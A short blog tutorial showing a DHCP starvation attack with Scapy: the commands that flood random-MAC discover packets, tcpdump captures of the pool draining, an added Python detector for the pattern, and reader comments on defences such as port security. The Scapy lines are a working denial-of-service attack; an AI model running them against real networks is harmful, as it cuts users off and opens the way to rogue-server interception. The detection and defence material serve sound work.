DHCP Denial of Service with scapy
1. Introduction
This is a small post explaining how to run a starvation attack against a DHCP server with only three lines of code (thanks to Scapy!).
Information & download regarding Scapy :
Information about DHCP Starvation attack :
2. Starvation attack with scapy
Running a starvation attack is nothing more than sending a lot of dummy DHCP requests with random source MAC addresses. After a few seconds, there are no more IP addresses available in the pool.
Warning: Don’t run this attack against networks you are not authorized to test!
[root@host1 ]$ scapy
Welcome to Scapy (v1.1.1 / -)
>>> conf.checkIPaddr = False
>>> dhcp_discover = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_discover,loop=1)
...............................................................^C
Sent 70 packets.
To stop the attack, simply press Ctrl+C.
Does it work? Yes, take a look at the following tcpdump captures.
2.1. The DHCP queries:
[root@host2 ]$ tcpdump -n -e -i eth0 port 68
ec:51:e2:20:5b:93 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 64:38:62:38:63:65, length 244
8e:97:0f:18:8a:19 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 39:33:39:37:65:66, length 244
28:a7:45:35:c0:47 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 38:34:66:64:33:63, length 244
...
2.2. Then the DHCP responses:
00:23:20:56:53:f0 > 64:38:62:38:63:65, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.117.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 39:33:39:37:65:66, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.118.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 38:34:66:64:33:63, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.119.68: BOOTP/DHCP, Reply, length 305
...
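The captures above carry two signs a defender can check for: the Ethernet source never matches the BOOTP client address ("Request from ..."), and every client address byte is an ASCII hex digit, because chaddr was filled with a random string. The following detector is an added example, not part of the original post; the function names, the constructed benign sample line and the max_clients threshold are assumptions.

```python
import re
from collections import Counter

# Client broadcast as printed by `tcpdump -n -e` in section 2.1.
LINE_RE = re.compile(
    r"(?P<eth>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) > ff:ff:ff:ff:ff:ff,.*?"
    r"0\.0\.0\.0\.68 > 255\.255\.255\.255\.67: BOOTP/DHCP, "
    r"Request from (?P<chaddr>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)
HEX_ASCII = set(b"0123456789abcdef")

# The first three lines are the capture from section 2.1; the last one is a
# constructed benign client whose Ethernet source equals its chaddr.
TAIL = (" > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: "
        "0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from ")
SAMPLE = [
    "ec:51:e2:20:5b:93" + TAIL + "64:38:62:38:63:65, length 244",
    "8e:97:0f:18:8a:19" + TAIL + "39:33:39:37:65:66, length 244",
    "28:a7:45:35:c0:47" + TAIL + "38:34:66:64:33:63, length 244",
    "00:11:22:33:44:55" + TAIL + "00:11:22:33:44:55, length 244",
]


def parse(line):
    """Return (ethernet source, BOOTP chaddr), or None for other lines."""
    m = LINE_RE.search(line)
    return (m["eth"].lower(), m["chaddr"].lower()) if m else None


def chaddr_is_ascii_hex(chaddr):
    """True when every chaddr byte is an ASCII hex digit, as in the capture."""
    return all(b in HEX_ASCII for b in bytes.fromhex(chaddr.replace(":", "")))


def analyse(lines, max_clients=50):
    """Summarise one capture window; max_clients is an assumed threshold."""
    stats, clients = Counter(), set()
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        stats["requests"] += 1
        clients.add(parsed[1])
        stats["mac_mismatch"] += parsed[0] != parsed[1]
        stats["ascii_hex_chaddr"] += chaddr_is_ascii_hex(parsed[1])
    stats["distinct_clients"] = len(clients)
    suspicious = stats["mac_mismatch"] > 0 or len(clients) > max_clients
    return dict(stats), suspicious
```

Feed it the lines of one capture window from a segment without a DHCP relay; analyse(SAMPLE) reports three mismatching requests out of four and marks the window as suspicious.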
3. The End
Hope you enjoy.
© 2010 – 2014, foip. All rights reserved.
Hi my friend,
Thank you for this info, but how can I prevent this on my network?
Hi, it depends on your environment. See some examples here: http://hakipedia.com/index.php/DHCP_Starvation
Hello! You will need to enable port security. Settings may vary by distributor, but the main way I use to prevent this attack is to limit the number of MAC sources allowed from one port.
Another thing that’s good to do is enable a single port to trust the legitimate DHCP server. When someone runs this DoS attack, they will easily be able to set up a rogue DHCP server acting as the default gateway, and become man in the middle.
I’m just using a Linux gateway serving as a hotspot. Can I prevent this using iptables? Can you please tell me how to do it? I’m worried because I did your procedure and it consumed all the IPs and hung. I need to prevent this…
I’m afraid I have no idea. Such attacks are usually prevented on the switch “ports”. The goal is to limit the number of clients (MAC addresses) behind a physical port. Maybe Google knows the solution for your environment.
Good luck.